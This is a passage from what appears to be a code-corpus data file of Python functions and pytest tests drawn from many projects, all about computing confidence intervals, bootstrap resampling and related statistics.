_parametric_ci\n\n return _parametric_ci(arr, ci=ci)", "def get_bootstrap_CI(self, alpha, num_samples):\n return None", "def get_bootstrap_CI(self, alpha, num_samples):\n return None", "def ci(self):\n var_assumptions = self.var_assumptions if self.var_assumptions == \"pooled\" else \"unequal\"\n ci_vals = self.comparison.zconfint_diff(self.alpha, self.hypothesis_sm, var_assumptions)\n\n return [ci_vals, self.ci_percents]", "def confidence_intervals(self, level = 95):\n margin = (100 - level) / 2 # interval is middle level% of vals, so this is margin to either side of it\n try:\n len(self.binom_control)\n len(self.binom_treatment)\n\n except:\n self.binom_distribution()\n\n control = self.binom_control\n treatment = self.binom_treatment\n\n control_upper = np.percentile(a = control, q = level + margin)\n control_lower = np.percentile(a = control, q = margin)\n self.interval_control = {'lower': control_lower, 'upper':control_upper, 'level':level}\n\n treatment_upper = np.percentile(a = treatment, 
q = level + margin)\n treatment_lower = np.percentile(a = treatment, q = margin)\n self.interval_treatment = {'lower': treatment_lower, 'upper':treatment_upper, 'level':level}\n\n return self.interval_control, self.interval_treatment", "def get_bootstrap_CI(self, alpha, num_samples):\n raise NotImplementedError(\"This is an abstract method and needs to be implemented in derived classes.\")", "def boot_conf_intervals(indep,\n dep,\n estimator,\n display_name=None,\n resample_cases=False,\n significance=0.05,\n num_sims=10000,\n verbose=True,\n seed=None,\n precision=4):\n if display_name is None:\n display_name = \"\"\n\n est_params = estimator.fit(indep, dep)\n est_params = np.array(est_params)\n\n params_arr = resampling.boot_param_dist(indep=indep,\n dep=dep,\n estimator=estimator,\n num_sims=num_sims,\n resample_cases=resample_cases,\n seed=seed,\n include_fixed_params=False,\n verbose=verbose)\n\n if estimator.has_restricted_params:\n est_params = est_params[estimator.estimated_params_indices]\n\n (bca_ci_df,\n percentile_ci_df,\n basic_ci_df) = _confidence_intervals(params_arr=params_arr,\n est_params=est_params,\n significance=significance,\n estimator=estimator,\n indep=indep,\n dep=dep)\n\n if verbose:\n def my_formatter(x):\n format_str = '.' + str(precision) + 'f'\n return format(x, format_str)\n\n formatters = [my_formatter for dummy in range(len(bca_ci_df.columns))]\n\n print()\n print(\"confidence level: \", 100.0 * (1.0 - significance), \"%\")\n print()\n print(\"bootstrap bca confidence intervals\")\n print()\n print(bca_ci_df.to_string(formatters=formatters))\n# if latex:\n# print(bca_ci_df.to_latex(escape=False, formatters=formatters))\n# else:\n print(\"bootstrap percentile confidence intervals\")\n print()\n print(percentile_ci_df.to_string(formatters=formatters))\n print()\n print(\"bootstrap basic confidence intervals\")\n print()\n print(basic_ci_df.to_string(formatters=formatters))\n print()\n\n return bca_ci_df, percentile_ci_df, basic_ci_df", "def compute_confidence_interval(data):\n a = 1.0 * np.array(data)\n m = np.mean(a)\n std = np.std(a)\n pm = 1.96 * (std / np.sqrt(len(a)))\n return m, pm", "def confidenceInterval(model, N = 30):\n predicted_accuracies = [0]*N\n predicted_roc = [0]*N\n for i in tqdm(range(N)):\n X_train, X_test, y_train, y_test = train_test_split(X, y_binary, random_state=i)\n scaler = StandardScaler()\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n model = model.fit(X_train, y_train)\n predicted_accuracies[i] = accuracy_score(model.predict(X_test), y_test)\n predicted_roc[i] = roc_auc_score(model.predict(X_test), y_test)\n r = np.mean(predicted_roc)\n m = np.mean(predicted_accuracies)\n\n variance_roc = np.var(predicted_roc)\n variance_acc = np.var(predicted_accuracies)\n sd_acc = np.sqrt(variance_acc)\n sd_roc = np.sqrt(variance_roc)\n CI_acc = 2*sd_acc\n CI_roc = 2*sd_roc\n return m, CI_acc, r, CI_roc", "def test_conf_interval_normal_method_no_conditionals(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``;\n # with no ``conditional_cols``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=None,\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert 
list(pred_df.columns) == [\"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.05, 290.37, 292.42, 292.74), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.41, -5.08, -3.04, -2.72), (\n \"quantiles are incorrect\")", "def compute_interval_limits(bias, acceleration, n_boots, ci=95):\n from scipy.stats import norm\n from numpy import isnan, nan\n\n alpha = _compute_alpha_from_ci(ci)\n\n alpha_low = alpha / 2\n alpha_high = 1 - (alpha / 2)\n\n z_low = norm.ppf(alpha_low)\n z_high = norm.ppf(alpha_high)\n\n kws = {'bias': bias, 'acceleration': acceleration}\n low = _compute_quantile(z_low, **kws)\n high = _compute_quantile(z_high, **kws)\n\n if isnan(low) or isnan(high):\n return low, high\n\n else:\n low = int(norm.cdf(low) * n_boots)\n high = int(norm.cdf(high) * n_boots)\n return low, high", "def bootstrap(series, func=statistics.mean, confidence=0.9):\n n = len(series)\n n_bootstrap = 250\n digests = []\n for j in range(n_bootstrap):\n bootstrap_sample = [\n random.choice(series)\n for _ in range(n)\n ]\n digest = func(bootstrap_sample)\n digests.append(digest)\n digests.sort()\n low, mid, high = (1.0-confidence)/2.0, 0.5, (1.0+confidence)/2.0\n low, mid, high = int(low*n_bootstrap), int(mid*n_bootstrap), int(high*n_bootstrap)\n return digests[low], digests[mid], digests[high]", "def get_confidence_interval(self, scores, ci_method='bca', ci_size=0.95, replications=100000, seed_value=None):\n def score(x):\n return np.array([x.mean()])\n data = np.array([float(score) for score in scores])\n if min(data) == max(data):\n return tuple([min(data), max(data)])\n bs = IIDBootstrap(data)\n if seed_value is not None:\n bs.seed(seed_value)\n ci = bs.conf_int(score, replications, method=ci_method, size=ci_size, tail='two')\n return tuple([ci[0][0], ci[1][0]])", "def test_conf_interval_normal_method(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.14, -4.88, -3.24, -2.98), (\n \"quantiles are incorrect\")", "def get_bootstraps(self):\n col_range = range(self.response.shape[1])\n random_state = np.random.RandomState(seed=self.random_seed)\n return random_state.choice(col_range, size=(self.num_bootstraps, self.response.shape[1])).tolist()", "def confidence(samples, confidence_level):\n mean = scipy.mean(samples)\n sdev = scipy.std(samples)\n n = len(samples)\n df = n - 1\n t = distributions.t.ppf((1+confidence_level)/2.0, df)\n interval = (interval_low, 
interval_high) = ( mean - t * sdev / math.sqrt(n) , mean + t * sdev / math.sqrt(n) )\n interval_size = interval_high - interval_low\n interval_percentage = interval_size / mean * 100.0\n return (interval, mean, sdev, interval_percentage)", "def bootstrap_interval(data, percentiles=(2.5, 97.5), n_boots=100):\n # Create empty array to fill the results\n bootstrap_means = np.zeros([n_boots, data.shape[-1]])\n for ii in range(n_boots):\n # Generate random indices for data *with* replacement, then take the sample mean\n random_sample = resample(data)\n bootstrap_means[ii] = random_sample.mean(axis=0)\n\n # Compute the percentiles of choice for the bootstrapped means\n percentiles = np.percentile(bootstrap_means, percentiles, axis=0)\n return percentiles", "def do_mean_cis_differ(mean1, ci1, mean2, ci2):\n\n assert ci1 >= 0.0 and ci2 >= 0.0, 'Found negative confidence interval from bootstrapping.'\n x1 = mean1 - ci1\n y1 = mean1 + ci1\n x2 = mean2 - ci2\n y2 = mean2 + ci2\n return do_intervals_differ((x1, y1), (x2, y2))", "def plot_ci_bootstrap(xs, ys, resid, nboot=500, ax=None): \n if ax is None:\n ax = plt.gca()\n\n bootindex = sp.random.randint\n\n for _ in range(nboot):\n resamp_resid = resid[bootindex(0, len(resid) - 1, len(resid))]\n # Make coeffs of for polys\n pc = np.polyfit(xs, ys + resamp_resid, 1) \n # Plot bootstrap cluster\n ax.plot(xs, np.polyval(pc, xs), \"r-\", linewidth=2, alpha=3.0 / float(nboot))\n\n return ax", "def calc_bootstrap(fcs,obs,ref,func, bootstrap_range, L, B):\n \n from sklearn.utils import resample\n \n idxs = np.arange(len(fcs))\n results = []\n \n random_state = 0\n for smp in range(B):\n block_sample = np.array([]).astype(int)\n while(len(block_sample) < len(fcs)):\n random_state += 1\n rolls = resample(idxs, n_samples=1, random_state=random_state)[0]\n block = np.roll(idxs, rolls)[0:L]\n block_sample = np.append(block_sample, block)\n\n block_sample = block_sample[0:len(idxs)]\n results.append(func(fcs[block_sample],obs[block_sample],ref[block_sample]))\n \n try:\n out = [ np.percentile(results, bootstrap_range[0]), \n func(fcs,obs,ref), #np.mean(results), \n np.percentile(results, bootstrap_range[1])]\n except:\n out = [ np.percentile(results, 2.5), \n func(fcs,obs,ref), #np.mean(results), \n np.percentile(results, 97.5)]\n\n # For indicating the statistical significance \n # of the lower boundary:\n if(out[0]>0): \n out.append('*')\n else:\n out.append('')\n \n return out", "def _get_uncertainty_regions(\n mus: np.array, stds: np.array, beta_sqrt: float\n) -> Union[np.array, np.array]:\n low_lims, high_lims = [], []\n\n for i in range(0, mus.shape[1]):\n low_lim, high_lim = _get_uncertainty_region(mus[:, i], stds[:, i], beta_sqrt)\n low_lims.append(low_lim.reshape(-1, 1))\n high_lims.append(high_lim.reshape(-1, 1))\n\n return np.hstack(low_lims), np.hstack(high_lims)", "def bootstrap(data,func,nboot):\n\n n = len(data)\n resamples = np.array([[random.choice(data) for i in range(n)]\n for j in range(nboot)])\n return np.apply_along_axis(func, 1, resamples)", "def confint(arr):\n res=[[],[],[]]\n #r=hpd(arr)\n r=(sap(arr,2.5),sap(arr,97.5))\n res[0]=r[0]\n res[1]=arr.mean(0)\n res[2]=r[1]\n return np.array(res)", "def bootstrap(data, alpha=0.05, n_bootstrap = 2000, func=None, **func_args):\n\t\n\tassert data.ndim == 3, 'Data is not 3-dimensional. Function only works for 3-D data.' 
\n\t\n\t# Trials form the second dimension\n\tn_trials = data.shape[1]\n\t\n\t# generate randomised bootstrap resamples as random indices\n\tbootstrap_index = np.random.randint(0, n_trials, \n\t\t\t\t\t\t\t\t\t\t(n_trials, n_bootstrap) )\n\t\n\t# For each bin in the histogram, randomly samples from the results\n\t# of each trial and repeats, effectively, n_bootstrap times \n\ttrials_bootstrap = data[:, bootstrap_index, :]\n\t\n\t# dimension one is the trials, zero is the conditions; this averaging \n\t# goes across the trials creating a PSTH for each condition, and,\n\t# importantly, for each bootstrap resample\n\tavg_bootstrap = trials_bootstrap.mean(axis=1)\n\t\n\tif func:\n\t\tavg_bootstrap = func(avg_bootstrap, **func_args)\n\t\t\n\t# find percentile values for each bin along the bootstrap resamples,\n\t# which are on axis 1 \n\tCI_pos = np.percentile(avg_bootstrap, 100*(1 - (alpha/2.)), \n\t\t\t\t\t\t\t\taxis=1)\n\tCI_neg = np.percentile(avg_bootstrap, 100*(alpha/2.), \n\t\t\t\t\t\t\t\taxis=1)\n\n\n\treturn CI_pos, CI_neg", "def confidenceInterval(start,end,confidence):\n\n\tmean = 0.5*(end+start)\n\tstddev = getStdDev(0.5*(end-start), confidence)\n\n\treturn (mean,stddev)", "def confidence_interval(self):\r\n coh_var = np.zeros((self.input.data.shape[0],\r\n self.input.data.shape[0],\r\n self._L), 'd')\r\n for i in range(self.input.data.shape[0]):\r\n for j in range(i):\r\n if i != j:\r\n coh_var[i, j] = tsu.jackknifed_coh_variance(\r\n self.spectra[i],\r\n self.spectra[j],\r\n self.eigs,\r\n adaptive=self._adaptive\r\n )\r\n\r\n idx = triu_indices(self.input.data.shape[0], 1)\r\n coh_var[idx[0], idx[1], ...] = coh_var[idx[1], idx[0], ...].conj()\r\n\r\n coh_mat_xform = tsu.normalize_coherence(self.coherence,\r\n 2 * self.df - 2)\r\n\r\n lb = coh_mat_xform + dist.t.ppf(self.alpha / 2,\r\n self.df - 1) * np.sqrt(coh_var)\r\n ub = coh_mat_xform + dist.t.ppf(1 - self.alpha / 2,\r\n self.df - 1) * np.sqrt(coh_var)\r\n\r\n # convert this measure with the normalizing function\r\n tsu.normal_coherence_to_unit(lb, 2 * self.df - 2, lb)\r\n tsu.normal_coherence_to_unit(ub, 2 * self.df - 2, ub)\r\n\r\n return ub - lb", "def bootstrap_ci(data: np.ndarray,\n stat_fcn,\n num_reps: int,\n alpha: float,\n ci_sides: int,\n bias_correction: bool = False,\n studentized: bool = False,\n seed: int = None):\n assert isinstance(data, np.ndarray)\n assert isinstance(num_reps, int) and num_reps > 0\n assert ci_sides == 1 or ci_sides == 2\n\n # Compute the statistic of interest based on the empirical distribution (input data)\n stat_emp = stat_fcn(data)\n\n # Get the bootstrap replications\n if data.ndim == 1:\n # Size of the samples drawn by the bootstrap method have to be equal input sample, since the variance of the\n # statistic to be computed depends on sample size\n size_sample = data.shape[0]\n # Set the seed if provided\n if seed is not None:\n np.random.seed(seed)\n # Draw samples of data with replacement (uniform weights)\n data_bs = np.random.choice(data, (size_sample, num_reps), replace=True)\n else:\n # Only use this function for 1D data sets\n raise NotImplementedError\n\n # Compute the statistic of interest based on the resampled distribution\n # Do it along each row (axis=0) -->> bootstrap replications\n stat_bs = np.apply_along_axis(stat_fcn, 0, data_bs) # dim = 1 x num_reps\n\n # Correct for the bias introduced by bootstrapping\n # Note: other estimates of the bias-correction factor than stat_emt possible, see [4]\n if bias_correction:\n # bias-corrected statistic (see (2) in [2], or (11.10) 
in [3])\n stat_bs_bc = 2*stat_emp - np.mean(stat_bs) # same as bias = mean_repl - stat_emp; repl_bc = stat_emp - bias\n stat_ret = stat_bs_bc # use the correction also for the bs replications? -->> No (so far)\n # Note: bias-correction can be dangerous in practice. Even though T_bc(D) is less biased than T(D),\n # the bias-corrected estimator may have substantially larger variance. This is due to a possibly higher\n # variability in the estimate of the bias, particularly when computed from small data sets.\n else:\n # Return the estimator based on the original sample a.k.a. empirical distribution\n stat_ret = stat_emp\n\n # Compute the deviation to the value of the statistic based on the empirical distribution (see [7])\n # This is analogous to the deviation of the empirical value around the true population value\n # i.e. delta = stat_emp - stat_pop\n # Note: it makes no difference if one uses the percentile operator before or after this difference\n delta_bs = stat_bs - stat_emp # dim = 1 x num_reps\n\n # Confidence interval with asymptotic refinement (a.k.a. percentile-t method)\n if studentized:\n # Compute the standard deviation of the original sample\n se_emp = np.std(data, ddof=0)/np.sqrt(data.shape[0]) # for dividing by (n-1) set ddof=1\n if se_emp < 1e-9:\n warn('Standard deviation in the empirical data (se_emp) is below 1e-9.', UserWarning)\n\n # Compute the standard error of the replications for the bootstrapped t-statistic\n se_bs = np.std(stat_bs, ddof=0)/np.sqrt(data_bs.shape[0]) # dim = num_reps x 1\n if se_bs < 1e-9: # use any for version 2 above\n warn('Standard deviation in the bootstrapped data (se_bs) is below 1e-9. '\n 'Setting confidence interval bounds to infinity.', UserWarning)\n return stat_ret, [-np.infty, np.infty]\n\n # Compute the t-statistic of the replications\n t_bs = delta_bs/se_bs # is consistent with [3, p. 360]\n\n if ci_sides == 2: # Two-sided confidence interval\n t_bs.sort()\n t_lo, t_up = np.percentile(t_bs, [100*alpha/2., 100 - 100*alpha/2.])\n ci_lo = stat_emp - t_up*se_emp # see [3, (11.6) p. 364]\n ci_up = stat_emp - t_lo*se_emp # see [3, (11.6) p. 364]\n\n elif ci_sides == 1: # One-sided confidence interval (upper bound)\n t_bs.sort()\n t_lo = np.percentile(t_bs, 100*alpha)\n ci_lo = -np.inf\n ci_up = stat_emp - t_lo*se_emp # see [3, (11.6) p. 364]\n\n else:\n raise pyrado.ValueErr(given=ci_sides, eq_constraint=\"1 or 2\")\n\n # Confidence interval without asymptotic refinement (a.k.a. 
basic method)\n else:\n if ci_sides == 2: # Two-sided confidence interval\n delta_bs.sort()\n delta_lo, delta_up = np.percentile(delta_bs, [100*alpha/2., 100 - 100*alpha/2.])\n ci_lo = stat_emp - delta_up\n ci_up = stat_emp - delta_lo\n\n elif ci_sides == 1: # One-sided confidence interval (upper bound)\n delta_bs.sort()\n delta_lo = np.percentile(delta_bs, 100*alpha)\n ci_lo = -np.inf\n ci_up = stat_emp - delta_lo\n\n else:\n raise pyrado.ValueErr(given=ci_sides, eq_constraint=\"1 or 2\")\n\n return stat_ret, [ci_lo, ci_up]", "def test_conf_interval_normal_method_with_bounds(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n # with enforced lower limit (``min_admissible_value``)\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=290.0,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.0, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (290.0, 290.0, 290.0, 290.0), (\n \"quantiles are incorrect\")", "def test_conf_interval_normal_method_no_small_sample_calc(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``;\n # with no small sample size calculation\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=None,\n small_sample_size_method=None,\n small_sample_size_quantile=None,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.64, -5.26, -2.86, -2.49), (\n \"quantiles are incorrect\")", "def get_ci_sigma_unknown(p_data, p_alpha):\n\n # -- -------------------------------------------\n # Gather the core statistic values\n sample_mean = np.mean(p_data)\n sample_std = np.std(p_data, ddof=1) # using ddof=1 for sample std\n sample_size = len(p_data)\n\n df = sample_size - 1\n # -- -------------------------------------------\n\n\n # -- -------------------------------------------\n # Get the standard error of the mean \n sem = get_sem(\n p_provided_std = sample_std,\n p_sample_size = sample_size\n )\n # -- -------------------------------------------\n\n\n # -- ------------------------------------------- \n # Calculate the Margin of Error and Confidence Interval\n _, upper_critical_value = get_two_tailed_critical_values(p_alpha = p_alpha)\n\n upper_critical_t = 
stats.t.ppf(upper_critical_value, df)\n\n # Get the margin of error:\n moe = upper_critical_t * sem\n\n # Calculate the confidence interval:\n ci = np.array([sample_mean - moe, sample_mean + moe])\n # -- -------------------------------------------\n\n\n # -- -------------------------------------------\n Result = namedtuple('Result', 'sample_mean sample_std sample_size alpha sem confidence_level_pct critical_t_statistic margin_of_error confidence_interval')\n\n result = Result(\n sample_mean,\n sample_std,\n sample_size,\n p_alpha,\n sem,\n upper_critical_value * 100,\n upper_critical_t,\n moe,\n ci\n )\n\n return result\n # -- -------------------------------------------", "def ci_mean_std_unknown(array, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n # mean of the sample\n mean = np.mean(array)\n # standard deviation\n std = np.std(array)\n # size of the sample\n n = len(array)\n # degrees of freedom\n df = n - 1\n # calculate the standard error\n std_error = std / np.sqrt(n)\n # find the t critical value\n t_star = np.round(stats.t.ppf(1 - alpha / 2, df), 3)\n # margin of error\n margin_of_error = np.round(t_star * std_error, 2)\n # calculate the lower and upper confidence bounds\n lcb = np.round(mean - margin_of_error, 2)\n ucb = np.round(mean + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Mean: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def confidence_interval(data, control_label=None, *args, **kwargs):\n def fn(control, test):\n c_means = CompareMeans(DescrStatsW(test), DescrStatsW(control))\n if _is_proportion(control, test):\n return c_means.zconfint_diff()\n else:\n return c_means.tconfint_diff()\n\n return _apply(data, fn, control_label)", "def test_confidence_intervals(self):\n # Taken from a T-Test table\n\n # Two Tailed\n p, ci = _p_value_and_confidence_intervals(2.228, 10, 'two')\n\n self.assertAlmostEqual(p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n np.testing.assert_allclose(ci, [-2.228, 2.228], atol=.001)\n\n # Left One-Tailed\n p, ci = _p_value_and_confidence_intervals(1.895, 7, 'left')\n\n self.assertAlmostEqual(p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n self.assertTrue(np.isinf(ci[0]))\n np.testing.assert_allclose(ci, [-np.inf, 1.895], atol=.001)\n\n # Right One-Tailed\n p, ci = _p_value_and_confidence_intervals(1.761, 14, 'right')\n\n self.assertAlmostEqual(1-p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n self.assertTrue(np.isinf(ci[1])) \n np.testing.assert_allclose(ci, [-1.761, np.inf], atol=.001)", "def ci_diff_mean_std_unknown(array1, array2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n\n # means of samples\n mean1 = np.mean(array1)\n mean2 = np.mean(array2)\n\n # standard deviation fo samples\n std1 = np.std(array1)\n std2 = np.std(array2)\n\n # size of the samples\n n1 = len(array1)\n n2 = len(array2)\n\n # difference of the two means\n diff_mean = mean1 - mean2\n\n # degrees of freddom\n deg_fred = deg_fred_two_means(std1, std2, n1, n2)\n\n # find the t critical value\n t_star = np.round(stats.t.ppf(1 - alpha / 2, deg_fred), 3)\n\n # margin of error\n margin_of_error = t_star * np.sqrt((std1 ** 2 / n1) + (std2 ** 2 / n2))\n\n # upper and lower confidence bounds\n lcb = np.round(diff_mean - margin_of_error, 2)\n ucb = np.round(diff_mean + margin_of_error, 2)\n\n print(\n \"{}% Confidence Interval for difference of two 
population means: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def _nelson_aalen_ci(estimate, variance, conf_type, conf_level):\n # Standard normal quantile for normal approximation confidence intervals\n quantile = st.norm.ppf((1 - conf_level) / 2)\n\n # Compute confidence intervals at the observed event times\n if conf_type == \"linear\":\n error = quantile * np.sqrt(variance)\n lower = estimate + error\n upper = estimate - error\n elif conf_type == \"log\":\n error = np.exp(quantile * np.sqrt(variance) / estimate)\n lower = estimate * error\n upper = estimate / error\n else:\n # This should not be reachable\n raise RuntimeError(f\"Invalid confidence interval type: {conf_type}.\")\n\n # Force confidence interval lower bound to be 0\n lower = np.maximum(lower, 0.)\n\n return lower, upper", "def calculate_ci(data, ci_level=0.99):\n\n # remove NaNs\n ys = data.dropna().values\n\n # calculate CI\n n = len(ys)\n std_err = sem(ys)\n h = std_err * t.ppf((1 + ci_level) / 2, n - 1)\n\n return h", "def residual_bootstrap(self, X: np.ndarray, y: np.ndarray, n=None, B=1000, model=None):\n # fit the model if it hasn't been run\n if model.run is False:\n model.fit(X, y);\n resid = model.residuals\n pred = model.predictions\n boot_est = [None] * B\n result = {} # to store the mean, std_err\n index = 0 \n for _ in range(B):\n idx = np.random.randint(low=0, high=n, size=n)\n boot_yi = pred + resid[idx]\n model.fit(X, boot_yi)\n boot_est[index] = tuple(model.theta)\n index += 1\n \n #self.boot_est['std_err'] = np.std(statistic, ddof=1, axis=0)\n result['estimates'] = boot_est\n result['est_mean'] = np.mean(boot_est, axis=0)\n result['est_err'] = np.std(boot_est, ddof=1, axis=0)\n return result", "def bootstrap_errors(self, arr, k=100):\n val = np.zeros(k)\n\n for i in range(k):\n rand_selection = np.random.choice(arr, len(arr))\n val[i] = self.varience(rand_selection)\n sigma = np.sqrt(np.average(np.square(val))\n - np.square(np.average(val)))\n return sigma", "def _bootstrap_ci_from_std(index, bootstrap_metric_std, test_metric, bottom_col, top_col, alpha=0.95):\n\n assert len(bootstrap_metric_std) == len(test_metric)\n\n df_res = pd.DataFrame(index=index)\n\n print('Calculating bootstrap CIs')\n\n result = np.empty((len(bootstrap_metric_std), 2))\n for i in tqdm(range(len(bootstrap_metric_std))):\n if pd.isna(test_metric[i]):\n result[i, :] = [np.NAN, np.NAN]\n\n result[i, :] = st.norm.interval(alpha, loc=test_metric[i], scale=bootstrap_metric_std[i])\n\n df_res[[bottom_col, top_col]] = result\n\n return df_res", "def state_confidences(self, X: List[np.ndarray], **kwargs) -> List[np.ndarray]:", "def bootstrap(data, iterations=10000):\n\n boot_mean = []\n\n for n in range(0, iterations):\n\n boot = resample(data, replace=True, n_samples=None,\n random_state=None)\n\n boot_mean.append(np.mean(boot))\n\n final_mean = np.mean(boot_mean)\n\n final_std = np.std(boot_mean, dtype=np.float64)\n\n return final_mean, final_std", "def test_conf_interval_normal_method_fallback(data):\n df = data[\"df\"]\n df = df.sample(n=10)\n new_df = data[\"new_df\"]\n\n # ``quantile_estimation_method = \"normal_fit\"``\n # fallback expected for all slices as df is small (10)\n # and ``sample_size_thresh`` is large (20)\n with pytest.warns(Warning):\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=20,\n small_sample_size_method=\"std_quantiles\",\n 
small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.31, 290.57, 292.23, 292.49), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.15, -4.89, -3.23, -2.97), (\n \"quantiles are incorrect\")", "def bootstrap_binom_err(k, n, CL=[0.025, 0.975], B=10000, type='percentile'):\n phat = k/n\n\n # Special case must be treated separately\n if k == 0:\n lower = 0\n upper = 1 - (1-CL[1])**(1/n)\n\n # Special case must be treated separately\n elif k == n:\n lower = CL[0]**(1/n)\n upper = 1\n\n # Normal\n else:\n bs = bootstrap_sample_binomial(k=k, n=n, B=B)\n if type == 'percentile':\n lower = np.percentile(bs, CL[0]*100, interpolation='lower') / n\n upper = np.percentile(bs, CL[1]*100, interpolation='higher') / n\n elif type == 'basic':\n lower = 2*phat - np.percentile(bs, CL[1]*100, interpolation='higher') / n\n upper = 2*phat - np.percentile(bs, CL[0]*100, interpolation='lower') / n\n else:\n raise Exception(f'bootstrap_binom_err: unknown bootstrap type = {type}')\n\n return np.array([lower, upper])", "def cal_thresh(pred_prob,labels):\n mu_stds = []\n for i in range(19):\n pos_mu, pos_std = fit(pred_prob[labels==i, i])\n mu_stds.append([pos_mu, pos_std])\n return mu_stds", "def test_conf_interval_normal_method_multivar_conditionals(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n # with multi-variate ``conditional_cols``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\", \"z_categ\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"z_categ\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.26, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.15, -4.89, -3.23, -2.97), (\n \"quantiles are incorrect\")", "def ci_diff_mean_std_known(array1, array2, std1, std2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n\n 